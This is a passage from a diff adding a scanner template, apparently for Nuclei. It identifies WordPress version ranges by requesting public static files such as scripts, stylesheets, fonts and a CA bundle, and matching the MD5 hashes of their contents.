"(\"7d82adbb0596605c1916c47eea233a94\" == md5(body))" + - type: dsl + name: 5.1 - 5.5.3 + dsl: + - "(\"dbd0d1fb592c2e6eb891e7321206518b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b46c7133554eca3ae339ce3a5e45e0ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery-migrate.js" + matchers: + - type: dsl + name: 4.5.3 - 5.0.11 + dsl: + - "(\"6c57b762589f13ea5b3579ca5e6c369b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"00970611f0ee1cadf746d3770c111dea\" == md5(body))" + - type: dsl + name: 3.6 - 4.4.24 + dsl: + - "(\"90e237d5f01035b958feaf514ef27f7a\" == md5(body))" + - type: dsl + name: 5.1 - 5.5.3 + dsl: + - "(\"351c89ef1b09861916f4f022db000832\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c91800f536bebf3fd9b3f710b174d10d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-embed-template.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"c05d678a8197a72c4a44bf540017278a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fc394778444ed2c5e81d0f8e84f6542e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3391028c0cc005ab1761109496b535e7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"133c315433779bc4804a93c209e7e023\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"dea9c532ff8aba0f1fdf7e27a1c29637\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c3a5dc58ab725e53d26fafb26b5e92e6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/api-request.min.js" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"eb5b88948b1755a4bb607c33f63c0096\" == md5(body))" + - type: dsl + name: 5.0 - 5.2.9 + dsl: + - "(\"b1ae1aa42eaf4df3fdc59777f5ec7437\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8a0fadfcd419986aede647b929822406\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"fba259bfaa5b79101ee7873cfd8290bf\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"08ae4a1169a18c4dbc57bfaeaa444a3f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-auth-check-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b509442d92e813e382d582f90b2203fe\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"5a74de32f6b6dc6e4e6716845a839132\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"cceefa969cbff4bcacfa3a39ff48214c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6918ed92f82a791fdf6a38f726629b56\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"e8a7ffcfde36022642abee85dd4b629c\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"fcf78dfab422bd8cfcb95f716d7e0182\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"db82fc8e7e74da0fd4510ef2f001604b\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"7cb42356da59917aef639d39a31ff6e4\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"242281bf85fdfc3d237f7538719f0af0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9b15c1f9fbc142688edd4d027bb73f4b\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1483e8e2916295845be85876b1419a81\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"47e23f3fd1381204bea0e6925770460b\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"166ff0336201e38114db7bad497d0b12\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6cc944795bebf3d0d0e95a743d89bc15\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/api-request.js" + matchers: + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"8bab6e7977d3198174f6773395f2f570\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"5ec7c2daa2cde305e46eb4fd32c9bc92\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a09e9e461e42babc0b6fb87ddab313b7\" == md5(body))" + - type: dsl + name: 5.4 - 5.5.3 + dsl: + - "(\"df2c6676318b083ca21d83fa24abc463\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"39a2f7bc0f1ec2dfbf473770367b9367\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/data-controls.min.js" + matchers: + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"443383efa01f00f813069ec7346f11a1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"922b13d84d5d0f131c343b7685def0ad\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"6cfd451bddd4ce114e4cc3617ea814ea\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d04d238f97bbc53c88d65bfc48b7f095\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e8338db52ac85b7ef7bc0d15bc906a47\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/data-controls.js" + matchers: + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"215fa4db1ef071180a48d29f0dff4d64\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a3758795a5c7a0515f3fcbabe492c41b\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"89f88142f4b2f677d730aff3fc3169ea\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5d11f0b5b980602c219feab70f1a4538\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c33545009a5ab7aa13d75db39e4fb7c3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/inline-edit-post.min.js" + matchers: + - type: dsl + name: 4.7.4 - 4.8.15 + dsl: + - "(\"a92828462403c43b71d05af005db85c3\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"1c76cbbb1460865658523caa86f05cba\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"22853923e49914e8cdf4dbdd4061bd8b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"8650fc123b8fa812ec6fa89c062fb2d9\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3425f7b1fec9b03e0ddbcea73787e5f1\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"cc31e2a9fd4b5eafa00a735d3e20c4c1\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"167e7b26c864699559d930fc5ce72a7a\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"306b49c4726604b273860a46a7a69a96\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.9.33 + dsl: + - "(\"4750da6cb226bcab5cec8cc02fcde273\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"7325a1809985c86395457c6e841e2ab3\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"ec79f4a3d602fc297468ee7db7d8516b\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"582cb222b9cae2de8778686fbd4480ba\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"c9afb166c5182641d222f47fa2bd1c83\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"f1d32f222e77a360ff3c62d3a6ee223b\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"e693d1b2a22c2cb3ab04dbfb2416c172\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ab9800198ab0358fee9eb0f20f8c439d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"105b6a4bd36ef53c65687b9392ceabad\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"f3c5237e842ca29a5bba89ae4372784f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d10bc18ab7e8a367f41fe3f720c8ff63\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d8205a6571a691fabe5778430bd92715\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/edit-post/style-rtl.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"0974d972c691fa8dec8e8612188e1568\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"86922662b6c4570d6536929cc8a014cb\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5663a0bb9d3aa47a519091db0db70dca\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"10b5f68f1fb961fd9d8866675754862d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"5f555fd98462f48870e327d0e833fb9e\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"cdafe4406388192aa647e64797366ad0\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"aa4bccbdc1f73b5b7854b11379ac7972\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"607b3440b51d60b6d0954fc07a42b98e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e5ba2c4ebfc7201bab031634a0d9bdae\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/edit-post/style.min.css" + matchers: + - type: dsl + name: 5.0 - 5.0.1 + dsl: + - "(\"39a3cafa73d891260695fe68356ea308\" == md5(body))" + - type: dsl + name: 5.0.2 - 5.0.11 + dsl: + - "(\"bcfded1af21db1cdd0d49f32ddd77745\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6b148eae4202290641289889a11595bd\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6e41f54aa8a8614768fd20f398856568\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.3 + dsl: + - "(\"6165321c05c95b7d947f7bfd79c4126c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4d69c72a6b771829bdebfc72a91312b0\" == md5(body))" + - type: dsl + name: 5.3.4 - 5.3.6 + dsl: + - "(\"457d8351de9ec72ed4cdc16bf8d094ca\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2feabd4422aa451b9dda8249739804d8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4bd5df4898551b110d7a79ef5274d7c5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/image-edit.min.js" + matchers: + - type: dsl + name: 4.8 - 4.9.4 + dsl: + - "(\"390732f55dfa7529b5bf612b79cdedbf\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"53286d003e3e19eacc26926f76c0d7df\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"cd559285783b61754b780372f9093f51\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a851d6478c2108a61fbdc74b33f9dcda\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"40c9a1866d7ab4aec2346e02d82f4758\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"df9254c728a075b313345528aa68355b\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"0be84285d55ffcf75cc77e8fbd369d38\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.33 + dsl: + - "(\"7d425b225fde8dde845621fac4160a6d\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"9bf2c46c35fc9f3c9ef2069137efd686\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"8adcd44ebcd7a868786d8a228ac96a9f\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"8aefd8355be19a71bd7229f9ffb3517f\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"228d2d1f73335261a6ec6e41464cb5a9\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"56db71c85951d868ec1242aaec00c37a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"616f8750a3708a6d30de5d0ecbf20eac\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"040ada6c2220f56f7d2d3500b768809a\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"b9fdd6082449100b2d851ba9a2505829\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c423c74409e8b3a5821d6cc46b10bf15\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2730e4cb476c1255c108b23f85699b53\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media-gallery.js" + matchers: + - type: dsl + name: 4.7 - 5.0.10 + dsl: + - "(\"d0809048874d234e35abae65dc17710a\" == md5(body))" + - type: dsl + name: 3.8 - 4.6.19 + dsl: + - "(\"7cf21db8661f9201a784f638f77d2b26\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.34 + dsl: + - "(\"365f0de914a67921ec1ca7f2c1f6c7fc\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"75e959d883beb502e661572dd86d84f3\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.4 + dsl: + - "(\"875c61d7e23f27e63c483f1cfaa4d049\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.2 + dsl: + - "(\"07c7fe13aad9fd0975facf825ecce6b4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"fe92407c916ec408ca14ea3489ea1260\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.6 + dsl: + - "(\"b8fd6328bb26d1bfe5282dff92de14d5\" == md5(body))" + - type: dsl + name: 5.4.3 - 5.4.4 + dsl: + - "(\"cedcad9d0ed2e3791e9e2fddd1c243e8\" == md5(body))" + - type: dsl + name: 5.1.7 - 5.3.6 + dsl: + - "(\"eea2b604309b22751dcca66cc8d632ba\" == md5(body))" + - type: dsl + name: 4.7.19 - 5.0.11 + dsl: + - "(\"dce3af6c5cfec53acfa8de54ba8b2f73\" == md5(body))" + - type: dsl + name: 3.8.35 - 4.6.20 + dsl: + - "(\"5e4d0bdf91b1c228a28c1ec4deb870c6\" == md5(body))" + - type: dsl + name: 3.7.35 + dsl: + - "(\"4be2c115bd13d75efb6ecd8301eeca2b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/custom-background.js" + matchers: + - type: dsl + name: 4.7 - 4.8.14 + dsl: + - "(\"f4ceff60e63046245443bc55ee7baba9\" == md5(body))" + - type: dsl + name: 3.8 - 4.6.19 + dsl: + - "(\"f26af7294ee07fb9a0cb88c2a8697623\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.34 + dsl: + - "(\"517aabb873f93a3ce7e5d6fa191bdbb9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"c20d43ed14bb4784a28296e98e174afd\" == md5(body))" + - type: dsl + name: 3.2 - 3.3.3 + dsl: + - "(\"f83425a586539ee867b165e4a94a54a8\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"f5aa17555ab1dc09cf1ecca75e3e596e\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"2d5c840f364432114e1a5761a910afc5\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.10 + dsl: + - "(\"3e22f2941127d8ca57718fa7de91568b\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.4 + dsl: + - "(\"cc358c331f8258166040ec13020cac1f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.2 + dsl: + - "(\"04587d7b662f46d6098f03252254111f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"97ade5c88a76faf72762519bc30c9a03\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.6 + dsl: + - "(\"a1dfdf155fbb6ba80da54b9972b506a8\" == md5(body))" + - type: dsl + name: 5.4.3 - 5.4.4 + dsl: + - "(\"38cf2f220ca17793ccd71e8d16d8486d\" == md5(body))" + - type: dsl + name: 5.1.7 - 5.3.6 + dsl: + - "(\"f99c35000beb3c31c8d8c50a1a26925d\" == md5(body))" + - type: dsl + name: 4.9.16 - 5.0.11 + dsl: + - "(\"c98d592e5df4a09d8657bc1aa8c89aa9\" == md5(body))" + - type: dsl + name: 4.7.19 - 4.8.15 + dsl: + - "(\"da12e436ee9fb945ec6a8bfee4fff3a7\" == md5(body))" + - type: dsl + name: 3.8.35 - 4.6.20 + dsl: + - "(\"bad20392d17f9d5f65d577deab13b542\" == md5(body))" + - type: dsl + name: 3.7.35 + dsl: + - "(\"be8eec5e57c66879f172eaf9e5ec762b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/lists/plugin.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"c584630c3c2aee6040dc54f78658f380\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"951aff9ce655daa3fa7ef637b9841c9f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"ebb03e951bb87f4aa69a1328da082522\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"d38fe745364acb23d92b278bcdadcc76\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"89daaa512ec64685e43a7b8dc027e6b6\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7948197f62adb44f10885de01cb569ec\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"a50a5f7469bc374bdf17a75c0cd4d98a\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"9007b591cde52e133de6a54490a4ea59\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b19b342c0b7e49d869254590e4b0df5b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"59443d279888d73242396855314096a3\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b61f8a2c808b097aadd14c601d17f3c1\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"4e754876049026025970fb07ee03af3e\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"49dc5b57b14ad1232a5ffb37d96370d3\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"2044a08452b145970ba8155e0f1e00fe\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"8a3d576259af5b0327177c43f63c3232\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"f27f6e413858324dfb9751a089df550d\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"6e3aa443bc42227ce7afee73b8bb90ee\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"299f723fb54eaae381bc49b4a1712784\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/certificates/ca-bundle.crt" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"dd1c7bdebdfc411eb8a336e3d758692c\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c3d19568d619663bd612ca5129c26c55\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"aab39209c0b97f2736d2270762c3624b\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"b6ea3b5f9b5cc919157579ecdefd7901\" == md5(body))" + - type: dsl + name: 3.9 - 4.3.25 + dsl: + - "(\"978976c7bbfab9219a6f0a8a66a4da6f\" == md5(body))" + - type: dsl + name: 3.7 - 3.8.35 + dsl: + - "(\"34120794e34a546b6de505bc6a89bcc2\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"d147a698ed8a7435c9e9b247947dff40\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"8bf79be04d97a454855bd1874202faf1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/colors/_mixins.scss" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"1f5a52b31cf5aba613aa845f2db7ac9f\" == md5(body))" + - type: dsl + name: 4.4 - 4.6.20 + dsl: + - "(\"45226dc97aee32844ae5b2c7953c50f8\" == md5(body))" + - type: dsl + name: 4.0 - 4.3.25 + dsl: + - "(\"53e25fcbec91e57c9127342e6f2736ee\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"4b98278e5b5d5d8a5e3dbe6d246086ee\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"0c671ea644e705d3ec65d2586dd48dfb\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"18d869c6a21b54fdf1038dadc8b62810\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"954efa737206be92e93d6b37e5b196c5\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"723a63056857f5f5f511f42f35782362\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"5860c2c0a06f69f860481178fe83ba43\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.ttf" + matchers: + - type: dsl + name: 4.5 - 5.1.8 + dsl: + - "(\"8fea1fce46bafe469ba2f101fdc583e2\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"4e1e8fbebedb4172f1635a4cf29624e8\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"8a457a7b9d43377c070b0fe91732ed95\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"0405baf6fced62a8bc43c1c850a71228\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"b2888b3f2157dade22fa872b83d5f7d0\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"d95c104c80bd6a47f25bc9c59b06a8ac\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"ece97919ac9f753c2ed3578d70c6e64c\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"f51888c22cfeae654d923aa37753f28e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1e37a8a1c2f7de7cb1afd8fba108875a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.eot" + matchers: + - type: dsl + name: 4.5 - 5.1.8 + dsl: + - "(\"30e410c715c6215fa7faa1c979b6480c\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"f379d2e99493ad79891d8300bf7a4a31\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"cea23664cbf4f6c9484411cbc651d983\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"51d3581d8ce7768f8dac4864012a5810\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f2821f84ced7b3da403692069e60a5ca\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"8c4f9123fff2c332e0cbb4ca4b9d9c15\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"2702a00aa0b250258802454163f55d22\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"e0eef7c2c85fd5996597c086a87c0ece\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"d34e1a3e778ff0cb40e991522d2f59f6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/fonts/dashicons.svg" + matchers: + - type: dsl + name: 4.5 - 5.1.8 + dsl: + - "(\"780e6968cd0e378b1f7723d89fa59ab5\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"21e6b28a2d95d779f553565c7831c97d\" == md5(body))" + - type: dsl + name: 4.1 - 4.2.29 + dsl: + - "(\"0b7e1f9b2978e48c89f99c5befaf77f8\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"f9927f4ee56c9da2582fc659ea081c45\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"299c19436c4fd8efbfae957faf3a5865\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"ac42d06eda2d36f30d635619065ce9cd\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"1c7e93cbb4adc19d2d93774853614642\" == md5(body))" + - type: dsl + name: 5.2 - 5.4.4 + dsl: + - "(\"90b2bb03672d9f516946d43fd968d320\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"b4e45f9133245fc26e06a0f7358ed758\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/login-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"abc638f8cc1a449589f918924b890a3f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"94fc4b1b3b506fae95e65c01ec8060ad\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"435422a1529aa1a64a7e832de8c7201d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"cf88e57d3607009d841323d6e9d63f5c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3bdff653d5bdbc0a4446629efdf092a6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"2ddb9c1a0460fb2bd1684880ec5e4b7f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"35f23fc2280b36e67ad2afb8c6737a03\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e71c620fc51e33ea2520d4fc4c4e6a1d\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"14c9bc1def45cfccbb2f373ce18eab15\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d76196885628d30f368438b677af21c9\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"b7af24abaa51453f7aef518ff4cf5be4\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"d356512a353a71d70dbeddc53fdf93ce\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"fbd7d52b70da05ac5766d38def80640e\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"af2c241362bc2db6bf4a1ef85b8c1900\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"6b88a75b7cca4c87d4b0e0f76b80613f\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"70286b97d5864bfc0872ee0aba7592ec\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"6892675f6dabe164a066d42040451ffd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4a03b95e0743063cbeccc8e5e88b12db\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"755f417e35f6e509919b4ed9779ef194\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"630fe75a208e73076c51908d642ed8b1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ec4fea38c27fedb1f549773ee967311f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c0b614a2810b91a5242adb6cb38d3420\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"46120afa9c33ecf316c421b3a73878d6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"2b6f0cc54e381fd52f3a3726e09c1d07\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - 